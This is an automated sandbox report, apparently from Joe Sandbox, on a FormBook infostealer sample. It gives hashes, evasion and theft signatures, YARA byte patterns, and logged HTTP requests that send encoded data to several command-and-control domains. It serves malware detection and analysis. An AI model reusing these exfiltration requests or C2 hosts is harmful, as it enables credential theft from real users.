Loading ...

Play interactive tourEdit tour

Analysis Report mp0nMsMroT.exe

Overview

General Information

Sample Name:mp0nMsMroT.exe
Analysis ID:286180
MD5:26a5cbbf551c2a810792aad03ed4d51b
SHA1:b509a59df8bcbb441cb8f527c920a37e49521098
SHA256:af164cd974521a1577be7c68ed0babe78e59f94ae13f79777f8565cef148c09f

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • mp0nMsMroT.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: 26A5CBBF551C2A810792AAD03ED4D51B)
    • mp0nMsMroT.exe (PID: 6732 cmdline: 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: 26A5CBBF551C2A810792AAD03ED4D51B)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4608 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 5556 cmdline: /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x15fe9:$sqlite3step: 68 34 1C 7B E1
    • 0x160fc:$sqlite3step: 68 34 1C 7B E1
    • 0x16018:$sqlite3text: 68 38 2A 90 C5
    • 0x1613d:$sqlite3text: 68 38 2A 90 C5
    • 0x1602b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16153:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.mp0nMsMroT.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.mp0nMsMroT.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.mp0nMsMroT.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15fe9:$sqlite3step: 68 34 1C 7B E1
        • 0x160fc:$sqlite3step: 68 34 1C 7B E1
        • 0x16018:$sqlite3text: 68 38 2A 90 C5
        • 0x1613d:$sqlite3text: 68 38 2A 90 C5
        • 0x1602b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16153:$sqlite3blob: 68 53 D8 7F 8C
        1.2.mp0nMsMroT.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.mp0nMsMroT.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x838a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18107:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1917a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 19 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: mp0nMsMroT.exeVirustotal: Detection: 47%Perma Link
          Source: mp0nMsMroT.exeReversingLabs: Detection: 79%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: mp0nMsMroT.exeJoe Sandbox ML: detected
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00408454 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_00408454
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00405098 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405098
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D7F470 FindFirstFileW,FindNextFileW,FindClose,5_2_02D7F470
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 4x nop then pop edi1_2_00415023
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 4x nop then pop edi1_2_0040C12E
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 4x nop then pop esi1_2_004151C5
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 4x nop then pop ebx1_2_004066D4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi5_2_02D85023
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi5_2_02D851C5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi5_2_02D7C12E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx5_2_02D766D7

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49726
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49732
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49738
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.98.99.30:80 -> 192.168.2.5:49744
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49750
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49752
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1Host: www.smileyefero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1Host: www.cxyl968.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1Host: www.bestselfietools.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1Host: www.homecaredispatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1Host: www.netrworksoultions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1Host: www.splishysplashie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1Host: www.ugpounds.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1Host: www.kuralike.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1Host: www.cdershoushichang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1Host: www.cakoi.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1Host: www.davabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1Host: www.icfc-lr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.196.13.28 34.196.13.28
          Source: Joe Sandbox ViewIP Address: 34.196.13.28 34.196.13.28
          Source: Joe Sandbox ViewIP Address: 64.98.145.30 64.98.145.30
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: TUCOWS-3CA TUCOWS-3CA
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cxyl968.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cxyl968.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cxyl968.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 76 45 39 32 66 32 71 67 71 39 72 68 4c 6e 65 64 6e 62 65 4b 4e 4b 39 31 57 39 77 61 43 71 77 41 65 30 47 6a 6f 78 44 61 53 54 38 72 30 78 36 73 77 6e 67 52 2d 30 4d 31 4c 30 41 39 71 6b 57 44 44 77 56 55 72 62 79 47 6c 7a 48 72 4a 41 49 47 66 76 31 79 4b 5a 46 6e 74 39 32 72 6e 52 6c 77 30 28 56 4a 5f 36 6d 76 5f 6c 70 48 71 39 32 79 61 68 6b 66 6b 54 47 4f 57 5a 77 49 4d 69 50 38 51 4c 41 6e 57 52 66 6c 64 72 66 6c 38 31 6f 76 76 52 6f 69 76 64 6c 45 45 53 43 28 49 4c 4b 75 39 64 4f 6f 70 48 49 6b 47 38 79 58 32 48 36 35 5f 34 32 4f 73 76 74 67 78 52 31 62 6d 51 51 48 47 67 49 7e 58 47 30 45 57 44 41 73 55 28 66 46 6a 30 68 72 6a 62 56 39 79 4f 4c 4a 42 67 46 33 66 62 68 75 74 66 5a 61 42 6f 47 32 73 7a 45 42 68 59 4f 67 51 7a 6d 69 34 63 41 76 53 4b 63 50 30 6f 5a 74 56 5a 6f 46 6e 33 75 32 50 70 53 73 68 49 66 53 56 46 37 68 6d 76 6b 49 79 4b 41 79 68 34 4b 69 7a 43 69 39 77 42 43 4a 4a 32 5a 77 63 54 42 69 57 64 37 36 71 53 72 71 4e 50 49 58 71 4a 67 4a 49 34 4f 42 44 45 47 5a 34 65 4a 44 50 77 57 4f 55 74 69 4c 77 48 5a 4d 53 71 48 72 6d 63 43 55 49 4b 65 70 49 4d 63 7e 63 6f 56 56 4f 55 72 67 37 68 6a 4d 55 39 53 47 53 54 36 57 67 78 73 38 4f 32 73 36 61 47 45 49 5a 49 66 6e 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.bestselfietools.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.bestselfietools.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bestselfietools.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 41 73 59 74 6c 2d 66 2d 77 4b 55 42 4a 4b 33 49 30 72 51 6a 30 57 75 48 41 55 44 72 71 53 75 31 6e 43 28 46 69 77 49 50 47 76 72 4d 6d 6e 4c 76 58 4b 71 5a 69 35 28 57 42 75 77 2d 6c 76 78 63 68 75 49 32 59 42 63 68 30 43 52 45 39 45 34 70 47 36 75 6a 51 31 6a 49 67 7a 4f 7a 64 65 52 6b 30 44 56 6a 74 4a 48 36 33 2d 6f 74 45 31 34 4b 6f 73 34 5f 70 30 73 48 57 49 7a 49 6d 61 75 4f 55 54 62 6b 31 4f 6a 43 6a 58 78 6e 6c 76 69 4c 69 44 71 4d 7e 7a 64 4c 28 4a 44 79 64 72 51 4f 72 55 38 50 62 36 74 53 31 41 78 59 53 79 78 34 50 48 37 47 7a 41 6e 68 78 67 63 51 32 57 6f 64 6f 75 37 7a 35 45 36 70 33 52 28 6f 79 36 67 65 49 64 50 2d 46 69 62 4d 51 30 6e 30 63 77 34 65 5a 46 50 63 4c 4e 45 58 69 6c 67 42 73 71 4f 71 34 36 30 6c 59 39 72 36 6c 5a 6b 73 45 50 50 63 6a 31 37 43 4e 6f 70 39 4f 45 55 72 39 71 48 42 35 32 74 68 45 36 75 38 45 65 5a 61 63 30 69 6d 46 35 43 46 49 69 59 79 6d 50 69 64 37 59 43 7a 66 6c 78 4e 75 46 33 68 78 44 68 54 33 73 4f 42 6e 4e 61 44 41 43 71 37 4f 48 39 36 4c 77 62 53 35 66 74 55 6c 69 71 63 51 59 50 32 6f 42 28 76 72 79 77 74 48 44 36 45 63 6d 4c 7a 6d 79 6f 6b 42 57 75 79 46 37 61 73 6e 45 39 5f 5a 6d 7e 62 4f 57 5a 67 35 45 4f 75 6f 62 5a 55 30 44 31 52 67 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=AsYtl-f-wKUBJK3I0rQj0WuHAUDrqSu1nC(FiwIPGvrMmnLvXKqZi5(WBuw-lvxchuI2YBch0CRE9E4pG6ujQ1jIgzOzdeRk0DVjtJH63-otE14Kos4_p0sHWIzImauOUTbk1OjCjXxnlviLiDqM~zdL(JDydrQOrU8Pb6tS1AxYSyx4PH7GzAnhxgcQ2Wodou7z5E6p3R(oy6geIdP-FibMQ0n0cw4eZFPcLNEXilgBsqOq460lY9r6lZksEPPcj17CNop9OEUr9qHB52thE6u8EeZac0imF5CFIiYymPid7YCzflxNuF3hxDhT3sOBnNaDACq7OH96LwbS5ftUliqcQYP2oB(vrywtHD6EcmLzmyokBWuyF7asnE9_Zm~bOWZg5EOuobZU0D1RgQ).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.homecaredispatch.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.homecaredispatch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.homecaredispatch.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 37 46 6c 6e 35 2d 47 4c 4d 4d 47 46 7e 67 33 5a 41 69 77 33 39 2d 4c 63 4d 5a 55 58 68 33 42 69 39 6d 61 79 63 74 52 6f 56 4d 49 72 52 4c 77 6a 6f 44 76 48 6d 34 36 39 59 44 7a 4f 30 4a 36 41 49 49 35 72 6b 4d 32 69 46 45 52 52 65 6e 77 39 78 74 56 49 44 54 41 6d 30 4d 78 47 77 4b 6e 48 58 6d 55 4d 72 75 4f 6a 30 41 34 33 35 57 72 63 6c 30 46 49 49 39 30 4a 45 59 34 75 4a 53 69 67 39 57 6e 42 33 50 77 46 32 79 6c 58 51 4a 4c 62 65 77 49 32 33 33 51 59 4b 65 4f 6c 7a 36 7e 31 4c 78 38 56 6a 6a 30 43 78 72 6b 5f 42 36 30 56 6f 64 68 5f 56 52 71 39 6b 73 54 49 64 4a 74 65 6b 4f 7a 34 70 46 68 73 77 33 53 52 75 69 6a 79 28 67 36 72 6f 36 69 4a 7a 45 31 78 77 6a 67 63 4b 71 79 6c 6d 41 38 6e 36 56 78 65 6e 64 7e 4b 71 51 61 39 43 61 38 6d 77 30 49 55 55 39 51 43 6c 59 51 50 62 5f 62 51 34 36 71 54 4b 46 48 75 54 73 71 5f 31 6a 53 67 4b 42 71 49 59 57 42 64 71 34 58 54 31 70 58 4a 44 77 32 55 31 43 52 6c 47 32 51 30 59 6b 43 43 4e 2d 58 77 50 76 54 6d 78 6b 35 64 4e 63 79 5a 28 6a 4f 68 52 4b 4d 58 7e 4a 41 76 73 49 72 36 59 74 49 5a 6f 2d 63 71 7e 76 36 42 6a 43 45 74 69 73 44 71 6f 5a 49 67 77 72 43 6d 4c 51 5a 4d 7e 6f 72 63 4e 42 6d 6c 7e 2d 54 62 72 54 67 44 6b 2d 74 35 57 69 78 43 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=7Fln5-GLMMGF~g3ZAiw39-LcMZUXh3Bi9mayctRoVMIrRLwjoDvHm469YDzO0J6AII5rkM2iFERRenw9xtVIDTAm0MxGwKnHXmUMruOj0A435Wrcl0FII90JEY4uJSig9WnB3PwF2ylXQJLbewI233QYKeOlz6~1Lx8Vjj0Cxrk_B60Vodh_VRq9ksTIdJtekOz4pFhsw3SRuijy(g6ro6iJzE1xwjgcKqylmA8n6Vxend~KqQa9Ca8mw0IUU9QClYQPb_bQ46qTKFHuTsq_1jSgKBqIYWBdq4XT1pXJDw2U1CRlG2Q0YkCCN-XwPvTmxk5dNcyZ(jOhRKMX~JAvsIr6YtIZo-cq~v6BjCEtisDqoZIgwrCmLQZM~orcNBml~-TbrTgDk-t5WixCmQ).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.netrworksoultions.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.netrworksoultions.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.netrworksoultions.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 79 4e 6f 53 68 67 6a 6f 69 77 55 4a 44 36 31 6b 55 79 5f 39 74 37 67 62 77 55 4e 37 36 74 62 45 6b 71 78 70 4d 7e 53 68 32 47 67 6a 34 67 66 55 4e 44 49 72 48 77 64 67 71 66 4c 71 2d 31 62 4a 30 68 36 56 76 50 51 59 44 38 48 42 32 6f 51 41 52 74 58 67 48 43 4a 54 71 75 68 71 35 7a 4f 4e 42 59 54 76 50 75 35 74 4f 58 54 6c 35 65 35 33 44 58 62 65 58 30 51 79 4f 55 49 4e 6e 6a 39 28 53 73 4c 70 59 35 56 74 67 6d 4a 79 4f 51 75 70 6a 6c 5a 65 37 6e 47 49 37 63 41 61 55 6a 5f 28 4d 49 75 41 44 4e 6d 6e 47 4f 6c 4e 61 64 77 6c 55 6e 36 7e 7a 28 2d 38 46 67 65 61 78 72 75 52 72 4a 6f 48 39 65 6f 47 44 61 55 6f 75 38 64 72 6b 73 42 51 4f 4b 6c 6c 50 30 32 4b 35 6e 6f 78 72 65 4a 73 6a 6f 50 64 42 68 75 47 5f 6f 50 30 42 69 46 4b 78 4d 31 74 36 7e 50 45 6c 35 44 35 50 53 44 39 52 75 55 56 6c 51 33 35 57 6e 4b 74 2d 31 57 74 58 65 6f 58 59 6b 7a 39 47 79 44 34 2d 41 53 43 61 44 5f 35 35 79 76 42 6c 37 79 74 59 39 47 7e 2d 5a 4f 4e 76 61 50 4e 74 77 74 47 2d 63 6d 6d 30 6a 37 7a 72 35 76 7e 39 6d 4f 36 4b 6a 69 39 37 4d 77 4e 49 64 72 65 51 35 64 66 41 